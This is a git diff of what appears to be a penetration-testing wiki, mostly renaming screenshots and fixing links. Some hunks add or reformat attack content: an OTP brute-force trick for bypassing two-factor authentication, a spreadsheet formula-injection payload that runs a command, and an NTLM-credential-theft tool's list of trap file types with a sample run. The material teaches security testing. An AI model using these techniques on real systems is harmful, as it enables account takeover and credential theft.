diff --git a/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (2).png b/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1).png similarity index 100% rename from .gitbook/assets/image (107) (2) (2) (2) (2) (2) (2).png rename to .gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1).png diff --git a/.gitbook/assets/image (107) (2) (2) (2) (2) (2).png b/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2).png similarity index 100% rename from .gitbook/assets/image (107) (2) (2) (2) (2) (2).png rename to .gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2).png diff --git a/.gitbook/assets/image (25) (2) (2) (2) (1).png b/.gitbook/assets/image (25) (2) (2) (2) (2) (1).png similarity index 100% rename from .gitbook/assets/image (25) (2) (2) (2) (1).png rename to .gitbook/assets/image (25) (2) (2) (2) (2) (1).png diff --git a/.gitbook/assets/image (25) (2) (2) (2).png b/.gitbook/assets/image (25) (2) (2) (2) (2) (2).png similarity index 100% rename from .gitbook/assets/image (25) (2) (2) (2).png rename to .gitbook/assets/image (25) (2) (2) (2) (2) (2).png diff --git a/.gitbook/assets/image (253) (1).png b/.gitbook/assets/image (253) (1) (2) (1).png similarity index 100% rename from .gitbook/assets/image (253) (1).png rename to .gitbook/assets/image (253) (1) (2) (1).png diff --git a/.gitbook/assets/image (254) (1) (1) (1) (1).png b/.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (254) (1) (1) (1) (1).png rename to .gitbook/assets/image (254) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (345) (2) (2) (2) (2) (1).png b/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (1).png similarity index 100% rename from .gitbook/assets/image (345) (2) (2) (2) (2) (1).png rename to .gitbook/assets/image (345) (2) (2) (2) (2) (2) (1).png diff --git a/.gitbook/assets/image (345) (2) (2) (2) (2).png b/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2).png similarity index 100% rename from .gitbook/assets/image (345) (2) (2) (2) (2).png rename to .gitbook/assets/image (345) (2) (2) (2) (2) (2) (2).png diff --git a/.gitbook/assets/image (413) (3) (1).png b/.gitbook/assets/image (413) (3) (3) (1).png similarity index 100% rename from .gitbook/assets/image (413) (3) (1).png rename to .gitbook/assets/image (413) (3) (3) (1).png diff --git a/.gitbook/assets/image (413) (3) (2).png b/.gitbook/assets/image (413) (3) (3) (2).png similarity index 100% rename from .gitbook/assets/image (413) (3) (2).png rename to .gitbook/assets/image (413) (3) (3) (2).png diff --git a/.gitbook/assets/image (413) (3).png b/.gitbook/assets/image (413) (3) (3) (3).png similarity index 100% rename from .gitbook/assets/image (413) (3).png rename to .gitbook/assets/image (413) (3) (3) (3).png diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 656f1e083..703600dc6 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -10,7 +10,7 @@ dht udp "DHT Nodes" ![](.gitbook/assets/image%20%28182%29.png) -![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png) +![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png) InfluxDB diff --git a/SUMMARY.md b/SUMMARY.md index 068a2aa75..8c00a331b 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -297,7 +297,7 @@ ## Pentesting Web -* [2FA Bypass](pentesting-web/2fa-bypass.md) +* [2FA/OTP Bypass](pentesting-web/2fa-bypass.md) * [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md) * [Bypass Payment Process](pentesting-web/bypass-payment-process.md) * [Captcha Bypass](pentesting-web/captcha-bypass.md) diff --git a/forensics/basic-forensics-esp/linux-forensics.md b/forensics/basic-forensics-esp/linux-forensics.md index c963b5e25..dc24071dc 100644 --- a/forensics/basic-forensics-esp/linux-forensics.md +++ b/forensics/basic-forensics-esp/linux-forensics.md @@ -395,7 +395,7 @@ Partition Record Format: In order to mount a MBR in Linux you first need to get the start offset \(you can use `fdisk` and the the `p` command\) -![](../../.gitbook/assets/image%20%28413%29%20%283%29%20%281%29.png) +![](../../.gitbook/assets/image%20%28413%29%20%283%29%20%283%29%20%281%29.png) An then use the following code diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index 6723970f2..e115832c8 100644 --- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n ![](../../../.gitbook/assets/image%20%28211%29.png) -![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29.png) +![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29.png) Because you will be able to call them diff --git a/pentesting-web/2fa-bypass.md b/pentesting-web/2fa-bypass.md index 5fb07cfbc..7aeecc388 100644 --- a/pentesting-web/2fa-bypass.md +++ b/pentesting-web/2fa-bypass.md @@ -1,4 +1,4 @@ -# 2FA Bypass +# 2FA/OTP Bypass ## **Bypassing two-factor authentication** @@ -57,6 +57,10 @@ Sometimes you can configure the 2FA for some actions inside your account \(chang You want be able to bypass the 2FA but you will be able to waste money of the company. +#### Infinite OTP regeneration + +If you can **generate a new OTP infinite times**, the **OTP is simple enough** \(4 numbers\), and you can try up to 4 or 5 tokens per generated OTP, you can just try the same 4 or 5 tokens every time and generate OTPs until it matches the ones you are using. + ### CSRF/Clickjacking Check if there is a CSRF or a Clickjacking vulnerability to disable the 2FA. diff --git a/pentesting-web/formula-injection.md b/pentesting-web/formula-injection.md index b82f194db..4e31dd35e 100644 --- a/pentesting-web/formula-injection.md +++ b/pentesting-web/formula-injection.md @@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** -![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%281%29.png) +![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png) diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md index b78bd7811..f5431d1a3 100644 --- a/pentesting/pentesting-web/wordpress.md +++ b/pentesting/pentesting-web/wordpress.md @@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t ``` -![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png) +![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png) ![](../../.gitbook/assets/image%20%28224%29.png) diff --git a/phishing-methodology/README.md b/phishing-methodology/README.md index a8468752c..ecd8117c4 100644 --- a/phishing-methodology/README.md +++ b/phishing-methodology/README.md @@ -320,7 +320,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors -![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29.png) +![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29%20%281%29.png) {% hint style="info" %} It's recommended to use the "**Send Test Email**" functionality to test that everything is working. diff --git a/windows/ntlm/places-to-steal-ntlm-creds.md b/windows/ntlm/places-to-steal-ntlm-creds.md index 2fc71b76f..1291441b7 100644 --- a/windows/ntlm/places-to-steal-ntlm-creds.md +++ b/windows/ntlm/places-to-steal-ntlm-creds.md @@ -6,58 +6,70 @@ This tool will **create several documents/files** that if accessed by the user somehow they will **start a NTLM authentication with the attacker**. -#### ntlm_theft supports the following attack types: +#### ntlm\_theft supports the following attack types: + Browse to Folder Containing: -- .url – via URL field -- .url – via ICONFILE field -- .lnk - via icon_location field -- .scf – via ICONFILE field (Not Working on Latest Windows) -- autorun.inf via OPEN field (Not Working on Latest Windows) -- desktop.ini - via IconResource field (Not Working on Latest Windows) + +* .url – via URL field +* .url – via ICONFILE field +* .lnk - via icon\_location field +* .scf – via ICONFILE field \(Not Working on Latest Windows\) +* autorun.inf via OPEN field \(Not Working on Latest Windows\) +* desktop.ini - via IconResource field \(Not Working on Latest Windows\) Open Document: -- .xml – via Microsoft Word external stylesheet -- .xml – via Microsoft Word includepicture field -- .htm – via Chrome & IE & Edge img src (only if opened locally, not hosted) -- .docx – via Microsoft Word includepicture field --.docx – via Microsoft Word external template --.docx – via Microsoft Word frameset webSettings --.xlsx - via Microsoft Excel external cell --.wax - via Windows Media Player playlist (Better, primary open) --.asx – via Windows Media Player playlist (Better, primary open) --.m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy) --.jnlp – via Java external jar --.application – via any Browser (Must be served via a browser downloaded or won’t run) + +* .xml – via Microsoft Word external stylesheet +* .xml – via Microsoft Word includepicture field +* .htm – via Chrome & IE & Edge img src \(only if opened locally, not hosted\) +* .docx – via Microsoft Word includepicture field + + -.docx – via Microsoft Word external template + + -.docx – via Microsoft Word frameset webSettings + + -.xlsx - via Microsoft Excel external cell + + -.wax - via Windows Media Player playlist \(Better, primary open\) + + -.asx – via Windows Media Player playlist \(Better, primary open\) + + -.m3u – via Windows Media Player playlist \(Worse, Win10 opens first in Groovy\) + + -.jnlp – via Java external jar + + -.application – via any Browser \(Must be served via a browser downloaded or won’t run\) Open Document and Accept Popup: -- .pdf – via Adobe Acrobat Reader +* .pdf – via Adobe Acrobat Reader Click Link in Chat Program: -- .txt – formatted link to paste into Zoom chat + +* .txt – formatted link to paste into Zoom chat > Example : -```sh -# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test -Created: test/test.scf (BROWSE) -Created: test/test-(url).url (BROWSE) -Created: test/test-(icon).url (BROWSE) -Created: test/test.rtf (OPEN) -Created: test/test-(stylesheet).xml (OPEN) -Created: test/test-(fulldocx).xml (OPEN) -Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) -Created: test/test-(includepicture).docx (OPEN) -Created: test/test-(remotetemplate).docx (OPEN) -Created: test/test-(frameset).docx (OPEN) -Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) -Created: test/test.asx (OPEN) -Created: test/test.jnlp (OPEN) -Created: test/test.application (DOWNLOAD AND OPEN) -Created: test/test.pdf (OPEN AND ALLOW) -Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) -Generation Complete. -``` - +> +> ```bash +> # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test +> Created: test/test.scf (BROWSE) +> Created: test/test-(url).url (BROWSE) +> Created: test/test-(icon).url (BROWSE) +> Created: test/test.rtf (OPEN) +> Created: test/test-(stylesheet).xml (OPEN) +> Created: test/test-(fulldocx).xml (OPEN) +> Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) +> Created: test/test-(includepicture).docx (OPEN) +> Created: test/test-(remotetemplate).docx (OPEN) +> Created: test/test-(frameset).docx (OPEN) +> Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) +> Created: test/test.asx (OPEN) +> Created: test/test.jnlp (OPEN) +> Created: test/test.application (DOWNLOAD AND OPEN) +> Created: test/test.pdf (OPEN AND ALLOW) +> Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) +> Generation Complete. +> ``` ### [All\_NTLM-Leak](https://github.com/Gl3bGl4z/All_NTLM_leak)